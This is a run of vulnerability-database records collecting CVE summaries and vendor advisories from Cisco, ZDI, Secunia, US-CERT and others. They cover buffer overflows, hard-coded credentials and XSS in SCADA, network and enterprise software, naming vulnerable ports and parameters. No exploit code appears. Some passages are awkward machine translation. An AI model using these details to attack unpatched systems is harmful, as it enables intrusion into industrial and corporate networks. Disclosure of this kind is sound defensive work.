subject to change without notice. Hewlett-Packard Company and the names of Hewlett-Packard products referenced herein are trademarks of Hewlett-Packard Company in the United States and other countries. Other product and company names mentioned herein may be trademarks of their respective owners. -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.10 (GNU/Linux) iEYEARECAAYFAk8KykcACgkQ4B86/C0qfVl09ACg1m3AQDGq/VzvFgb4j6bj3fJU VnkAoO9oPSjyrVB07qLIBpcXALxLRRRg =mXzy -----END PGP SIGNATURE----- . However, the information is applicable to all the devices listed above. This revision, version 6, of the Security Bulletin announces the availability of firmware updates for additional devices
var-201011-0225 Multiple stack-based buffer overflows in agent.exe in Setup Manager in Cisco Intelligent Contact Manager (ICM) before 7.0 allow remote attackers to execute arbitrary code via a long parameter in a (1) HandleUpgradeAll, (2) AgentUpgrade, (3) HandleQueryNodeInfoReq, or (4) HandleUpgradeTrace TCP packet, aka Bug IDs CSCti45698, CSCti45715, CSCti45726, and CSCti46164. The problem is Bug ID CSCti45698 , CSCti45715 , CSCti45726 ,and CSCti46164 It is a problem.By a third party (1) HandleUpgradeAll , (2) AgentUpgrade , (3) HandleQueryNodeInfoReq , (4) HandleUpgradeTrace TCP Arbitrary code could be executed via overly long parameters in the packet. Authentication is not required to exploit this vulnerability. The flaw exists within the Agent.exe component which listens by default on TCP port 40078. When processing the HandleUpgradeAll packet type an unchecked copy of user supplied data is performed into a stack-based buffer of a controlled size. Successful exploitation of this vulnerability leads to remote code execution under the context of the SYSTEM user. This may result in a compromise of the underlying system. Failed attempts may lead to a denial-of-service condition. ---------------------------------------------------------------------- Secure your corporate defenses and reduce complexity in handling vulnerability threats with the new Secunia Vulnerability Intelligence Manager (VIM) Beta. Join the beta: http://secunia.com/products/corporate/vim/ ---------------------------------------------------------------------- TITLE: Cisco Intelligent Contact Manager Setup Manager "Agent.exe" Multiple Vulnerabilities SECUNIA ADVISORY ID: SA42146 VERIFY ADVISORY: Secunia.com http://secunia.com/advisories/42146/ Customer Area (Credentials Required) https://ca.secunia.com/?page=viewadvisory&vuln_id=42146 RELEASE DATE: 2010-11-09 DISCUSS ADVISORY: http://secunia.com/advisories/42146/#comments AVAILABLE ON SITE AND IN CUSTOMER AREA: * Last Update * Popularity * Comments * Criticality Level * Impact * Where * Solution Status * Operating System / Software * CVE Reference(s) http://secunia.com/advisories/42146/ ONLY AVAILABLE IN CUSTOMER AREA: * Authentication Level * Report Reliability * Secunia PoC * Secunia Analysis * Systems Affected * Approve Distribution * Remediation Status * Secunia CVSS Score * CVSS https://ca.secunia.com/?page=viewadvisory&vuln_id=42146 ONLY AVAILABLE WITH SECUNIA CSI AND SECUNIA PSI: * AUTOMATED SCANNING http://secunia.com/vulnerability_scanning/personal/ http://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/ DESCRIPTION: Some vulnerabilities have been reported in Cisco Intelligent Contact Manager Setup Manager, which can be exploited by malicious people to compromise a vulnerable system. 1) A boundary error within Agent.exe when handling the "HandleUpgradeAll" packet can be exploited to cause a stack-based buffer overflow via a specially crafted request sent to e.g. TCP port 40078. 2) A boundary error within Agent.exe when handling the "AgentUpgrade" packet can be exploited to cause a stack-based buffer overflow via a specially crafted request sent to e.g. TCP port 40078. 3) A boundary error within Agent.exe when handling the "HandleQueryNodeInfoReq" packet can be exploited to cause a stack-based buffer overflow via a specially crafted request sent to e.g. TCP port 40078. 4) A boundary error within Agent.exe when handling the "HandleUpgradeTrace" packet can be exploited to cause a stack-based buffer overflow via a specially crafted request sent to e.g. TCP port 40078. Please see the vendor's advisory for the list of affected versions. SOLUTION: The vendor recommends to delete the Agent.exe file or restrict network access to the affected service. Further details available in Customer Area: http://secunia.com/products/corporate/EVM/ PROVIDED AND/OR DISCOVERED BY: sb, reported via ZDI. ORIGINAL ADVISORY: Cisco: http://tools.cisco.com/security/center/viewAlert.x?alertId=21726 ZDI: http://www.zerodayinitiative.com/advisories/ZDI-10-232/ http://www.zerodayinitiative.com/advisories/ZDI-10-233/ http://www.zerodayinitiative.com/advisories/ZDI-10-234/ http://www.zerodayinitiative.com/advisories/ZDI-10-235/ OTHER REFERENCES: Further details available in Customer Area: http://secunia.com/products/corporate/EVM/ DEEP LINKS: Further details available in Customer Area: http://secunia.com/products/corporate/EVM/ EXTENDED DESCRIPTION: Further details available in Customer Area: http://secunia.com/products/corporate/EVM/ EXTENDED SOLUTION: Further details available in Customer Area: http://secunia.com/products/corporate/EVM/ EXPLOIT: Further details available in Customer Area: http://secunia.com/products/corporate/EVM/ ---------------------------------------------------------------------- About: This Advisory was delivered by Secunia as a free service to help private users keeping their systems up to date against the latest vulnerabilities. Subscribe: http://secunia.com/advisories/secunia_security_advisories/ Definitions: (Criticality, Where etc.) http://secunia.com/advisories/about_secunia_advisories/ Please Note: Secunia recommends that you verify all advisories you receive by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor. ---------------------------------------------------------------------- Unsubscribe: Secunia Security Advisories http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org ---------------------------------------------------------------------- . ZDI-10-232: Cisco ICM Setup Manager Agent.exe HandleUpgradeAll Remote Code Execution Vulnerability http://www.zerodayinitiative.com/advisories/ZDI-10-232 November 7, 2010 -- CVE ID: CVE-2010-3040 -- CVSS: 10, (AV:N/AC:L/Au:N/C:C/I:C/A:C) -- Affected Vendors: Cisco -- Affected Products: Cisco Unified Intelligent Contact Management -- TippingPoint(TM) IPS Customer Protection: TippingPoint IPS customers have been protected against this vulnerability by Digital Vaccine protection filter ID 9915. -- Vendor Response: Cisco has issued an update to correct this vulnerability. More details can be found at: http://tools.cisco.com/security/center/viewAlert.x?alertId=21726 -- Disclosure Timeline: 2010-06-01 - Vulnerability reported to vendor 2010-11-07 - Coordinated public release of advisory -- Credit: This vulnerability was discovered by: * sb -- About the Zero Day Initiative (ZDI): Established by TippingPoint, The Zero Day Initiative (ZDI) represents a best-of-breed model for rewarding security researchers for responsibly disclosing discovered vulnerabilities. Researchers interested in getting paid for their security research through the ZDI can find more information and sign-up at: http://www.zerodayinitiative.com The ZDI is unique in how the acquired vulnerability information is used. Instead, upon notifying the affected product vendor, TippingPoint provides its customers with zero day protection through its intrusion prevention technology. Explicit details regarding the specifics of the vulnerability are not exposed to any parties until an official vendor patch is publicly available. Furthermore, with the altruistic aim of helping to secure a broader user base, TippingPoint provides this vulnerability information confidentially to security vendors (including competitors) who have a vulnerability protection or mitigation product. Our vulnerability disclosure policy is available online at: http://www.zerodayinitiative.com/advisories/disclosure_policy/ Follow the ZDI on Twitter: http://twitter.com/thezdi
var-202407-0046 mySCADA myPRO uses a hard-coded password which could allow an attacker to remotely execute code on the affected device. Authentication is not required to exploit this vulnerability.The specific flaw exists within the telnet service, which listens on TCP port 5005 by default. The issue results from the use of hard-coded credentials. mySCADA myPRO is an application software. myPRO is a professional HMI/SCADA system designed primarily for visualization and control of industrial processes
var-202410-2013 In mm_GetMobileIdIndexForNsUpdate of mm_GmmPduCodec.c, there is a possible out of bounds write due to an incorrect bounds check. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation. Google of Android Exists in an out-of-bounds write vulnerability.Information is obtained, information is tampered with, and service operation is interrupted. (DoS) It may be in a state. Google Pixel is a smartphone produced by Google in the United States. Google Pixel has a buffer overflow vulnerability. The vulnerability is caused by incorrect boundary checking in mm_GetMobileIdIndexForNsUpdate of mm_GmmPduCodec.c. Attackers can exploit this vulnerability to cause out-of-bounds write
var-201105-0156 Multiple buffer overflows in the ISSymbol ActiveX control in ISSymbol.ocx 61.6.0.0 and 301.1009.2904.0 in the ISSymbol virtual machine, as distributed in Advantech Studio 6.1 SP6 61.6.01.05, InduSoft Web Studio before 7.0+SP1, and InduSoft Thin Client 7.0, allow remote attackers to execute arbitrary code via a long (1) InternationalOrder, (2) InternationalSeparator, or (3) LogFileName property value; or (4) a long bstrFileName argument to the OpenScreen method. Overly long to method bstrFileName argument. This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Indusoft Thin Client. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.The specific flaw exists within ISSymbol.ocx ActiveX component. When an overly large string is passed as the 'InternationalOrder' parameter, a heap overflow occurs. This vulnerability can be leveraged to execute code under the context of the user running the browser. InduSoft Web Studio is a powerful and complete graphics control software that includes the various functional modules required to develop Human Machine Interface (HMI), Management Control, Data Acquisition System (SCADA) and embedded control. The Advantech Studio ISSymbol ActiveX control handles boundary errors in the \"InternationalSeparator\" property. The Advantech Studio ISSymbol ActiveX control is prone to multiple buffer-overflow vulnerabilities because the application fails to perform adequate boundary checks on user-supplied input. Failed exploit attempts will likely result in denial-of-service conditions. Advantech Studio 6.1 SP6 Build 61.6.01.05 is vulnerable; other versions may also be affected. There are multiple buffer overflow vulnerabilities in InduSoft ISSymbol ActiveX control 6.1 SP6 Build 61.6.01.05 (ISSymbol.ocx 61.6.0.0) and other versions. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 ZDI-12-155 : InduSoft Thin Client ISSymbol InternationalOrder Remote Code Execution Vulnerability http://www.zerodayinitiative.com/advisories/ZDI-12-155 August 22, 2012 - -- CVE ID: CVE-2011-0340 - -- CVSS: 7.5, AV:N/AC:L/Au:N/C:P/I:P/A:P - -- Affected Vendors: Indusoft - -- Affected Products: Indusoft WebStudio - -- TippingPoint(TM) IPS Customer Protection: TippingPoint IPS customers have been protected against this vulnerability by Digital Vaccine protection filter ID 12505. - -- Vendor Response: Indusoft has issued an update to correct this vulnerability. More details can be found at: http://www.indusoft.com/hotfixes/hotfixes.php - -- Disclosure Timeline: 2011-10-28 - Vulnerability reported to vendor 2012-08-22 - Coordinated public release of advisory - -- Credit: This vulnerability was discovered by: * Alexander Gavrun - -- About the Zero Day Initiative (ZDI): Established by TippingPoint, The Zero Day Initiative (ZDI) represents a best-of-breed model for rewarding security researchers for responsibly disclosing discovered vulnerabilities. Researchers interested in getting paid for their security research through the ZDI can find more information and sign-up at: http://www.zerodayinitiative.com The ZDI is unique in how the acquired vulnerability information is used. TippingPoint does not re-sell the vulnerability details or any exploit code. Instead, upon notifying the affected product vendor, TippingPoint provides its customers with zero day protection through its intrusion prevention technology. Explicit details regarding the specifics of the vulnerability are not exposed to any parties until an official vendor patch is publicly available. Furthermore, with the altruistic aim of helping to secure a broader user base, TippingPoint provides this vulnerability information confidentially to security vendors (including competitors) who have a vulnerability protection or mitigation product. Our vulnerability disclosure policy is available online at: http://www.zerodayinitiative.com/advisories/disclosure_policy/ Follow the ZDI on Twitter: http://twitter.com/thezdi -----BEGIN PGP SIGNATURE----- Version: PGP Desktop 10.2.0 (Build 1950) Charset: utf-8 wsBVAwUBUDUFHFVtgMGTo1scAQJ1Twf8C0MRiovFv7JVpAgg+lOYT3HW7MYdUKAx /I+4hvkGyeKKCCkvIOkx0y7eSdwp4paxVZAd0WYTfsG0K1h+bBngt6m+3Nicx0Iq YuqyOluJTW4ymXUSwvX8MZ39709DQXEl5yp9JvIX+Dc4WY7TKauGYKIfbb/VRMQq VYgQPhnlv8laGORlVREpu+yrOPdYLbQSucewpaLXd4b8uw1+Kmurjepiil5vxqPD G3fD23i1jGrbg6aX0AlvECo1M12alERft7wjtI21D7VP7G3uBYwiAJ8jxutavMQY Yf5K6rzdbx+96MuFco7aYB49GBQDpMYvWeWur3YEv1GqR7bSotpO1Q== =Yxrq -----END PGP SIGNATURE-----
var-200702-0378 Stack-based buffer overflow in the DCE/RPC preprocessor in Snort before 2.6.1.3, and 2.7 before beta 2; and Sourcefire Intrusion Sensor; allows remote attackers to execute arbitrary code via crafted SMB traffic. Snort IDS and Sourcefire Intrusion Sensor are prone to a stack-based buffer-overflow vulnerability because the network intrusion detection (NID) systems fail to handle specially crafted 'DCE' and 'RPC' network packets. An attacker can exploit this issue to execute malicious code in the context of the user running the affected application. Failed attempts will likely cause these applications to crash. The software provides functions such as packet sniffing, packet analysis, and packet inspection. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 National Cyber Alert System Technical Cyber Security Alert TA07-050A Sourcefire Snort DCE/RPC Preprocessor Buffer Overflow Original release date: February 19, 2007 Last revised: -- Source: US-CERT Systems Affected * Snort 2.6.1, 2.6.1.1, and 2.6.1.2 * Snort 2.7.0 beta 1 * Sourcefire Intrusion Sensors version 4.1.x, 4.5.x, and 4.6x with SEUs prior to SEU 64 * Sourcefire Intrusion Sensors for Crossbeam version 4.1.x, 4.5.x, and 4.6x with SEUs prior to SEU 64 Other products that use Snort or Snort components may be affected. I. The DCE/RPC preprocessor reassembles fragmented SMB and DCE/RPC traffic before passing data to the Snort rules. The vulnerable code does not properly reassemble certain types of SMB and DCE/RPC packets. An attacker could exploit this vulnerability by sending a specially crafted TCP packet to a host or network monitored by Snort. The DCE/RPC preprocessor is enabled by default, and it is not necessary for an attacker to complete a TCP handshake. US-CERT is tracking this vulnerability as VU#196240. This vulnerability has been assigned CVE number CVE-2006-5276. Further information is available in advisories from Sourcefire and ISS. II. III. Solution Upgrade Snort 2.6.1.3 is available from the Snort download site. Sourcefire customers should visit the Sourcefire Support Login site. Disable the DCE/RPC Preprocessor To disable the DCE/RPC preprocessor, comment out the line that loads the preprocessor in the Snort configuration file (typically /etc/snort.conf on UNIX and Linux systems): [/etc/snort.conf] ... #preprocessor dcerpc... Restart Snort for the change to take effect. Disabling the preprocessor will prevent Snort from reassembling fragmented SMB and DCE/RPC packets. This may allow attacks to evade the IDS. IV. References * US-CERT Vulnerability Note VU#196240 - <http://www.kb.cert.org/vuls/id/196240> * Sourcefire Advisory 2007-02-19 - <http://www.snort.org/docs/advisory-2007-02-19.html> * Sourcefire Support Login - <https://support.sourcefire.com/> * Sourcefire Snort Release Notes for 2.6.1.3 - <http://www.snort.org/docs/release_notes/release_notes_2613.txt> * Snort downloads - <http://www.snort.org/dl/> * DCE/RPC Preprocessor - <http://www.snort.org/docs/snort_htmanuals/htmanual_261/node104.html> * IBM Internet Security Systems Protection Advisory - <http://iss.net/threats/257.html> * CVE-2006-5276 - <http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2006-5276> ____________________________________________________________________ The most recent version of this document can be found at: <http://www.us-cert.gov/cas/techalerts/TA07-050A.html> ____________________________________________________________________ Feedback can be directed to US-CERT Technical Staff. Please send email to <cert@cert.org> with "TA07-050A Feedback VU#196240" in the subject. ____________________________________________________________________ For instructions on subscribing to or unsubscribing from this mailing list, visit <http://www.us-cert.gov/cas/signup.html>. ____________________________________________________________________ Produced 2007 by US-CERT, a government organization. Terms of use: <http://www.us-cert.gov/legal.html> ____________________________________________________________________ Revision History February 19, 2007: Initial Release -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.2.1 (GNU/Linux) iQEVAwUBRdop4+xOF3G+ig+rAQKdtAgAhQY66LRfVlNkH30Q5RI0gIo5Vhu14yDP qulLEyzjDhC7gDHWBGQYdE9eCy9Yf3P4BfKJS0766he/7CFn+BaDs7ohnXaynHQq +kMYNBMBg2RbrGKfOGRLHc0P6X1tSP3w45IppjOv9Yo5SUVDCa7beZWURCIKZyp6 OuYXtnpiGNctHgeU56US0sfuKj8qP7KOd9pCDRDQRhJ3UUd9wDpXee66HBxchh+w RSIQiMxisOX9mMYBW3z4DM/lb7PxXoa2Q7DwjM1NIOe/0tAObCOvF4uYhOLCVyNg +EbcN9123V0PW95FITlHXvJU6K8srnnK+Fhpfyi4vg5bYeEF2WiUrg== =T7v8 -----END PGP SIGNATURE----- . February 19, 2007 Summary: Sourcefire has learned of a remotely exploitable vulnerability in the Snort DCE/RPC preprocessor. Sourcefire has prepared updates for Snort open-source software to address this issue. Mitigating Factors: Users who have disabled the DCE/RPC preprocessor are not vulnerable. Recommended Actions: * Open-source Snort 2.6.1.x users are advised to upgrade to Snort 2.6.1.3 (or later) immediately. * Open-source Snort 2.7 beta users are advised to mitigate this issue by disabling the DCE/RPC preprocessor. This issue will be resolved in Snort 2.7 beta 2. Workarounds: Snort users who cannot upgrade immediately are advised to disable the DCE/RPC preprocessor by removing the DCE/RPC preprocessor directives from snort.conf and restarting Snort. However, be advised that disabling the DCE/RPC preprocessor reduces detection capabilities for attacks in DCE/RPC traffic. After upgrading, customers should reenable the DCE/RPC preprocessor. Detecting Attacks Against This Vulnerability: Sourcefire will be releasing a rule pack that provides detection for attacks against this vulnerability. Has Sourcefire received any reports that this vulnerability has been exploited? - No. Sourcefire has not received any reports that this vulnerability has been exploited. Acknowledgments: Sourcefire would like to thank Neel Mehta from IBM X-Force for reporting this issue and working with us to resolve it. ------------------------------------------------------------------------- Take Surveys. Earn Cash. Influence the Future of IT Join SourceForge.net's Techsay panel and you'll get the chance to share your opinions on IT & business topics through brief surveys-and earn cash http://www.techsay.com/default.php?page=join.php&p=sourceforge&CID=DEVDEV _______________________________________________ Snort-announce mailing list Snort-announce@lists.sourceforge.net https://lists.sourceforge.net/lists/listinfo/snort-announce . Resolution ========== All Snort users should upgrade to the latest version: # emerge --sync # emerge --ask --oneshot --verbose ">=net-analyzer/snort-2.6.1.3" References ========== [ 1 ] CVE-2006-5276 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-5276 Availability ============ This GLSA and any updates to it are available for viewing at the Gentoo Security Website: http://security.gentoo.org/glsa/glsa-200703-01.xml Concerns? ========= Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users machines is of utmost importance to us. Any security concerns should be addressed to security@gentoo.org or alternatively, you may file a bug at http://bugs.gentoo.org. License ======= Copyright 2007 Gentoo Foundation, Inc; referenced text belongs to its owner(s). The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license. http://creativecommons.org/licenses/by-sa/2.5
var-201112-0297 Multiple cross-site scripting (XSS) vulnerabilities in the Virus Scan Interface in SAP Netweaver allow remote attackers to inject arbitrary web script or HTML via the (1) instname parameter to the VsiTestScan servlet and (2) name parameter to the VsiTestServlet servlet. The CTC service has an error when performing some verification checks and can be utilized to access user management and OS command execution functions. Inputs passed to the BAPI Explorer through partial transactions are missing prior to use and can be exploited to inject arbitrary HTML and script code that can be executed on the target user's browser when viewed maliciously. When using transaction \"sa38\", RSTXSCRP reports an error and can be exploited to inject any UNC path through the \"File Name\" field. SAP NetWeaver is the technical foundation for SAP Business Suite solutions, SAP xApps composite applications, partner solutions, and custom applications. TH_GREP reports an error when processing a partial SOAP request, and can inject any SHELL command with the \"<STRING>\" parameter. The SPML service allows users to perform cross-site request forgery attacks, and can log in to the user administrator context to perform arbitrary operations, such as creating arbitrary users. SAP Netweaver is prone to multiple cross-site scripting vulnerabilities, a path traversal vulnerability, an html-injection vulnerability, a cross-site request-forgery vulnerability, and an authentication-bypass vulnerability. An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site, execute arbitrary commands in the context of the application, disclose sensitive information, perform certain administrative actions, gain unauthorized access, or bypass certain security restrictions
var-201407-0233 Multiple stack-based buffer overflows in Advantech WebAccess before 7.2 allow remote attackers to execute arbitrary code via a long string in the (1) ProjectName, (2) SetParameter, (3) NodeName, (4) CCDParameter, (5) SetColor, (6) AlarmImage, (7) GetParameter, (8) GetColor, (9) ServerResponse, (10) SetBaud, or (11) IPAddress parameter to an ActiveX control in (a) webvact.ocx, (b) dvs.ocx, or (c) webdact.ocx. This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Advantech WebAccess. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.The specific flaw exists within the webdact.ocx ActiveX Control. The control does not check the length of an attacker-supplied ProjectName string before copying it into a fixed length buffer on the stack. This could allow an attacker to execute arbitrary code in the context of the browser process. Advantech WebAccess HMI/SCADA is an HMI/SCADA software. Advantech WebAccess webvact.ocx, dvs.ocx and webdact.ocx ActiveX controls fail to properly handle long-length named ProjectName, SetParameter, NodeName, CCDParameter, SetColor, AlarmImage, GetParameter, GetColor, ServerResponse, SetBaud and IPAddress parameters, and attackers can build malicious A WEB page that entice a user to access, can crash an application or execute arbitrary code. Advantech WebAccess is prone to multiple remote stack-based buffer-overflow vulnerabilities. Failed exploit attempts will likely cause a denial-of-service condition. Advantech WebAccess 7.1 and prior are vulnerable. The software supports dynamic graphic display and real-time data control, and provides functions of remote control and management of automation equipment
var-201809-0087 WECON LeviStudio Versions 1.8.29 and 1.8.44 have multiple stack-based buffer overflow vulnerabilities that can be exploited when the application processes specially crafted project files. This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Wecon LeviStudioU. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.The specific flaw exists within the handling of the UserMgr.xml file. When parsing the GroupList ID element, the process does not properly validate the length of user-supplied data prior to copying it to a fixed-length stack-based buffer. An attacker can leverage this vulnerability to execute code under the context of Administrator. WECON LeviStudio is a set of human interface programming software from WECON, China
var-202411-1458 Cross Site Scripting vulnerability in DLink DWR 2000M 5G CPE With Wifi 6 Ax1800 and Dlink DWR 5G CPE DWR-2000M_1.34ME allows a local attacker to obtain sensitive information via the file upload feature of the VPN configuration module. D-Link Systems, Inc. of dwr-2000m Firmware has a cross-site scripting vulnerability.Information may be obtained and information may be tampered with. D-Link DWR-2000M is a wireless router from D-Link, a Chinese company. D-Link DWR-2000M has a cross-site scripting vulnerability. The vulnerability is caused by the lack of effective filtering and escaping of user-provided data by the application
var-201109-0089 Multiple unspecified vulnerabilities in Cisco Unified Service Monitor before 8.6, as used in Unified Operations Manager before 8.6 and CiscoWorks LAN Management Solution 3.x and 4.x before 4.1; and multiple EMC Ionix products including Application Connectivity Monitor (Ionix ACM) 2.3 and earlier, Adapter for Alcatel-Lucent 5620 SAM EMS (Ionix ASAM) 3.2.0.2 and earlier, IP Management Suite (Ionix IP) 8.1.1.1 and earlier, and other Ionix products; allow remote attackers to execute arbitrary code via crafted packets to TCP port 9002, aka Bug IDs CSCtn42961 and CSCtn64922, related to a buffer overflow. Cisco Unified Operations Manager and CiscoWorks LAN Management Solution Used in Cisco Unified Service Monitor Contains a vulnerability that allows arbitrary code execution. The problem is Bug ID CSCtn42961 and CSCtn64922 It is a problem.Skillfully crafted by a third party TCP port 9002 Arbitrary code could be executed via packets. Authentication is not required to exploit this vulnerability.The flaw exists within the brstart.exe service which listens by default on TCP port 9002. When handling an add_dm request the process uses a user provided value to allocate a buffer then blindly copies user supplied data into a fixed-length buffer on the heap. A remote attacker can exploit this vulnerability to execute arbitrary code under the context of the casuser user. Multiple EMC Ionix applications are prone to a buffer-overflow vulnerability. Successful exploits will result in the complete compromise of affected applications. Failed exploit attempts will result in a denial-of-service condition. The following applications are affected. Ionix Application Connectivity Monitor (Ionix ACM) version 2.3 and prior Ionix Adapter for Alcatel-Lucent 5620 SAM EMS (Ionix ASAM) version 3.2.0.2 and prior Ionix IP Management Suite (Ionix IP) version 8.1.1.1 and prior Ionix IPv6 Management Suite (Ionix IPv6) version 2.0.2 and prior Ionix MPLS Management Suite (Ionix MPLS) version 4.0.0 and prior Ionix Multicast Manager (Ionix MCAST) version 2.1 and prior Ionix Network Protocol Management Suite version (Ionix NPM) 3.1 and prior Ionix Optical Transport Management Suite version (Ionix OTM) 5.1 and prior Ionix Server Manager (EISM) version 3.0 and prior Ionix Service Assurance Management Suite (Ionix SAM) version 8.1.0.6 and prior Ionix Storage Insight for Availability Suite (Ionix SIA) version 2.3.1 and prior Ionix VoIP Availability Management Suite (Ionix VoIP AM) version 4.0.0.3 and prior. Details ======= CiscoWorks LAN Management Solution is an integrated suite of management functions that simplifies the configuration, administration, monitoring, and troubleshooting of a network. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 ESA-2011-029: Buffer overflow vulnerability in multiple EMC Ionix products. EMC will communicate the fixes for all other affected products as they become available. Regularly check EMC Knowledgebase solution emc274245 for the status of these fixes. Link to remedies: Registered EMC Powerlink customers can download software from Powerlink. For EMC Ionix Software, navigate in Powerlink to Home > Support > Software Downloads and Licensing > Downloads E-I Because the view is restricted based on customer agreements, you may not have permission to view certain downloads. Should you not see a software download you believe you should have access to, follow the instructions in EMC Knowledgebase solution emc116045. Credits: EMC would like to thank Abdul Aziz Hariri working with TippingPoint's Zero Day Initiative (http://www.zerodayinitiative.com) for reporting this issue. For explanation of Severity Ratings, refer to EMC Knowledgebase solution emc218831. EMC Corporation distributes EMC Security Advisories in order to bring to the attention of users of the affected EMC products important security information. EMC recommends all users determine the applicability of this information to their individual situations and take appropriate action. In no event shall EMC or its suppliers be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages, even if EMC or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. Cisco has released free software updates that address these vulnerabilities. There are no workarounds available to mitigate these vulnerabilities. This advisory is posted at: http://www.cisco.com/warp/public/707/cisco-sa-20110914-cusm.shtml Note: CiscoWorks LAN Management Solution is also affected by these vulnerabilities. The Software Update page displays the licensing and software version. They provides a way to continuously monitor active calls supported by the Cisco Unified Communications System. Both of these vulnerabilities are documented in Cisco bug ID CSCtn42961 ( registered customers only) and have been assigned CVE ID CVE-2011-2738. Vulnerability Scoring Details +---------------------------- Cisco has provided scores for the vulnerabilities in this advisory based on the Common Vulnerability Scoring System (CVSS). The CVSS scoring in this Security Advisory is done in accordance with CVSS version 2.0. CVSS is a standards-based scoring method that conveys vulnerability severity and helps determine urgency and priority of response. Cisco has provided a base and temporal score. Customers can then compute environmental scores to assist in determining the impact of the vulnerability in individual networks. Cisco has provided an FAQ to answer additional questions regarding CVSS at: http://www.cisco.com/web/about/security/intelligence/cvss-qandas.html Cisco has also provided a CVSS calculator to help compute the environmental impact for individual networks at: http://intellishield.cisco.com/security/alertmanager/cvss * CSCtn42961 - Cisco Unified Service Monitor Remote Code Execution CVSS Base Score - 10 Access Vector - Network Access Complexity - Low Authentication - None Confidentiality Impact - Complete Integrity Impact - Complete Availability Impact - Complete CVSS Temporal Score - 8.3 Exploitability - Functional Remediation Level - Official-Fix Report Confidence - Confirmed Impact ====== Successful exploitation of these vulnerabilities could allow an unauthenticated, remote attacker to execute arbitrary code on affected servers. Software Versions and Fixes =========================== When considering software upgrades, also consult http://www.cisco.com/go/psirt and any subsequent advisories to determine exposure and a complete upgrade solution. In all cases, customers should exercise caution to be certain the devices to be upgraded contain sufficient memory and that current hardware and software configurations will continue to be supported properly by the new release. If the information is not clear, contact the Cisco Technical Assistance Center (TAC) or your contracted maintenance provider for assistance. Mitigations that can be deployed on Cisco devices within the network are available in the Cisco Applied Mitigation Bulletin companion document for this advisory, which is available at the following link: http://www.cisco.com/warp/public/707/cisco-amb-201100914-cusm-lms.shtml Obtaining Fixed Software ======================== Cisco has released free software updates that address these vulnerabilities. Prior to deploying software, customers should consult their maintenance provider or check the software for feature set compatibility and known issues specific to their environment. Customers may only install and expect support for the feature sets they have purchased. By installing, downloading, accessing or otherwise using such software upgrades, customers agree to be bound by the terms of Cisco's software license terms found at http://www.cisco.com/en/US/docs/general/warranty/English/EU1KEN_.html or as otherwise set forth at Cisco.com Downloads at: http://www.cisco.com/public/sw-center/sw-usingswc.shtml Do not contact psirt@cisco.com or security-alert@cisco.com for software upgrades. Customers with Service Contracts +------------------------------- Customers with contracts should obtain upgraded software through their regular update channels. For most customers, this means that upgrades should be obtained through the Software Center on Cisco's worldwide website at http://www.cisco.com. Customers using Third Party Support Organizations +------------------------------------------------ Customers whose Cisco products are provided or maintained through prior or existing agreements with third-party support organizations, such as Cisco Partners, authorized resellers, or service providers should contact that support organization for guidance and assistance with the appropriate course of action in regards to this advisory. The effectiveness of any workaround or fix is dependent on specific customer situations, such as product mix, network topology, traffic behavior, and organizational mission. Due to the variety of affected products and releases, customers should consult with their service provider or support organization to ensure any applied workaround or fix is the most appropriate for use in the intended network before it is deployed. Customers without Service Contracts +---------------------------------- Customers who purchase direct from Cisco but do not hold a Cisco service contract, and customers who purchase through third-party vendors but are unsuccessful in obtaining fixed software through their point of sale should acquire upgrades by contacting the Cisco Technical Assistance Center (TAC). TAC contacts are as follows. * +1 800 553 2447 (toll free from within North America) * +1 408 526 7209 (toll call from anywhere in the world) * e-mail: tac@cisco.com Customers should have their product serial number available and be prepared to give the URL of this notice as evidence of entitlement to a free upgrade. Free upgrades for non-contract customers must be requested through the TAC. Refer to: http://www.cisco.com/en/US/support/tsd_cisco_worldwide_contacts.html for additional TAC contact information, including localized telephone numbers, and instructions and e-mail addresses for use in various languages. Exploitation and Public Announcements ===================================== The Cisco PSIRT is not aware of any public announcements or malicious use of the vulnerabilities described in this advisory. These vulnerabilities were reported to Cisco by ZDI and discovered by AbdulAziz Hariri. Status of this Notice: FINAL ============================ THIS DOCUMENT IS PROVIDED ON AN "AS IS" BASIS AND DOES NOT IMPLY ANY KIND OF GUARANTEE OR WARRANTY, INCLUDING THE WARRANTIES OF MERCHANTABILITY OR FITNESS FOR A PARTICULAR USE. YOUR USE OF THE INFORMATION ON THE DOCUMENT OR MATERIALS LINKED FROM THE DOCUMENT IS AT YOUR OWN RISK. CISCO RESERVES THE RIGHT TO CHANGE OR UPDATE THIS DOCUMENT AT ANY TIME. A stand-alone copy or Paraphrase of the text of this document that omits the distribution URL in the following section is an uncontrolled copy, and may lack important information or contain factual errors. Distribution ============ This advisory is posted on Cisco's worldwide website at : http://www.cisco.com/warp/public/707/cisco-sa-20110914-cusm.shtml In addition to worldwide web posting, a text version of this notice is clear-signed with the Cisco PSIRT PGP key and is posted to the following e-mail and Usenet news recipients. * cust-security-announce@cisco.com * first-bulletins@lists.first.org * bugtraq@securityfocus.com * vulnwatch@vulnwatch.org * cisco@spot.colorado.edu * cisco-nsp@puck.nether.net * full-disclosure@lists.grok.org.uk * comp.dcom.sys.cisco@newsgate.cisco.com Future updates of this advisory, if any, will be placed on 